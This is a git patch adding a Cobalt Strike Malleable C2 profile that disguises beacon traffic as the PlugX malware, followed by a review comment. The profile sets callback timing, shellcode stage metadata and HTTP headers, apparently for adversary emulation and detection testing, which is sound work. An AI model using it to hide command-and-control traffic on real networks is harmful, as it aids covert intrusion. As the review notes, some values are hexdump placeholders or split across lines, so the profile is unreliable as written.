From 39dff44dc182ff43478c0d1ed2ac4466c28f37ec Mon Sep 17 00:00:00 2001
From: Rahmat Nurfauzi
Date: Mon, 16 Jan 2023 15:32:21 +0700
Subject: [PATCH] Create plugx.profile Cobalt Strike Malleable C2 Profile - PlugX
---
 plugx.profile | 106 ++++++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 106 insertions(+)
 create mode 100644 plugx.profile
diff --git a/plugx.profile b/plugx.profile
new file mode 100644
index 0000000..ffc6ff1
--- /dev/null
+++ b/plugx.profile 
@@ -0,0 +1,106 @@
+#
+# PlugX Profile
+# Author: @infosecn1nja
+#
+# https://github.com/silence-is-best/c2db/blob/master/README.md
+
+set sleeptime "30000"; # use a ~30s delay between callbacks
+set jitter "10"; # throw in a 10% jitter
+
+stage {
+ set checksum "0";
+ set compile_time "28 Jun 2018 04:38:07";
+ set entry_point "5968";
+ set name "Shellcode.dll";
+ set rich_header "\x02\x8c\xde\x7b\x46\xed\xb0\x28\x46\xed\xb0\x28\x46\xed\xb0\x28\x00\xbc\x6f\x28\x42\xed\xb0\x28\x4f\x95\x23\x28\x4f\xed\xb0\x28\x46\xed\xb1\x28\x5b\xed\xb0\x28\x4b\xbf\x55\x28\x7d\xed\xb0\x28\x4b\xbf\x6c\x28\x47\xed\xb0\x28\x4b\xbf\x6e\x28\x47\xed\xb0\x28\x52\x69\x63\x68\x46\xed\xb0\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
+
+
+ # obfuscations
+ set userwx "true";
+ set stomppe "false";
+
+ # strings
+ stringw "/update?id=%8.8x";
+ stringw "VVubPDixKeBURoQIIyfb";
+ stringw "https";
+ stringw "POST";
+ stringw "POST";
+ string "d:\\work";
+ string "plug2.5";
+ string "Plug3.0";
+ string "Shell6";
+}
+
+http-get {
+
+ set uri "/";
+
+ client {
+
+ header "Accept" "*/*";
+ header "Cookie" "QhTbeUW+YzYYsZWz0PQvBvYIgo8=";
+ header "User-Agent" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)";
+ header "Connection" "Keep-Alive";
+ header "Cache-Control" "no-cache";
+
+ metadata {
+ base64url;
+ uri-append;
+ }
+ }
+
+ server {
+ header "Server" "nginx";
+ header "Content-Type" "text/html;charset=UTF-8";
+ header "Cache-Control" "no-cache";
+ header "Pragma" "no-cache";
+ header "Expires" "Thu, 01 Jan 1970 00:00:00 GMT";
+ header "X-Server" "ip-172-31-28-245";
+ header "Set-Cookie" "JSESSIONID=4618E9008B004BEE8FE5C81AB063A332; Path=/; HttpOnly";
+
+ output {
+ base64url;
+ prepend "............?";
+ append "..]..2......... 
 :...Q.";
+ print;
+ }
+ }
+}
+
+http-post {
+
+ set uri "/update";
+
+ client {
+
+ header "User-Agent" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1;";
+ header "Accept" "*/*";
+ header "x-debug" "0";
+ header "x-request" "0";
+ header "x-content" "61456";
+ header "x-storage" "1";
+ header "Cache-Control" "no-cache";
+
+ id {
+ netbios;
+ parameter "wd";
+ }
+
+ output {
+ print;
+ }
+ }
+
+ server {
+ header "Server" "Apache 1.3.27";
+ header "Accept-Ranges" "bytes";
+ header "Cache" "no-cache";
+ header "Content-Type" "text/html";
+
+ output {
+ netbios;
+ prepend "The Page You Requested Was Not Found!";
+ print;
+ }
+ }
+}
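Review bot: The `prepend "............?"` and `append "..]..2......... :...Q."` values in the http-get server output block look like hexdump renderings in which `.` stands for a non-printable byte, so as written the profile emits literal periods rather than the response framing those dots presumably represent; the `set rich_header` line shows the `\x` escape form such values would need, and until the real bytes are sourced a comment such as `# placeholder: dots stand for unprintable bytes copied from a hexdump` should say so, since anyone using this profile to validate PlugX detections would otherwise assume the byte pattern is reproduced. The `append` value is also split across two lines, which may not parse unless that break is an extraction artifact. `stringw "POST";` in the stage block appears twice and the second copy can be dropped. The http-post client User-Agent ends in `;SV1;"` with no closing `)`; if that deliberately mirrors a malformed header from the emulated sample it deserves a comment such as `# truncated UA kept as observed in the sample` so it is not "corrected" later. The header comment cites the c2db README but not which sample the header, cookie and string values were taken from; a one-line source note would help defenders mapping this profile to the PlugX indicators it is meant to reproduce.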